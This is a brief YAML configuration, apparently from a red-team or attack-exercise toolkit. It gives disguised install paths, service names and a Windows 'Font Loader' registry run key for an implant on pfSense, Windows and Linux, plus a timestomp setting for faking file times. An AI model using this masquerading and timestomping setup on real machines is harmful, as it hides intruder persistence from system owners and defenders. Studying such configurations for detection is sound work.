pfsense_binary: "/usr/bin/ipfw_netblock"
pfsense_service: "/etc/rc.d/ipfw_netblock"
pfsense_service_name: "ipfw_netblock"
pfsense_shell: "/usr/local/etc/rc.d/ipfw_netblock.sh"
windows_binary: "C:\\Windows\\Fonts\\snss.exe"
windows_binary_directory: "C:\\Windows\\Fonts"
windows_binary_name: "snss.exe"
windows_regkey_name: "Font Loader"
windows_binary_args: "--EnableFonts --EnableUserSelection"
linux_binary: "/lib/systemd/systemd-boot-system-key"
linux_service: "/lib/systemd/system/systemd-boot-system-key.service"
linux_service_name: "systemd-boot-system-key"
timestomp_time: "202303020758.15" #change depending on comp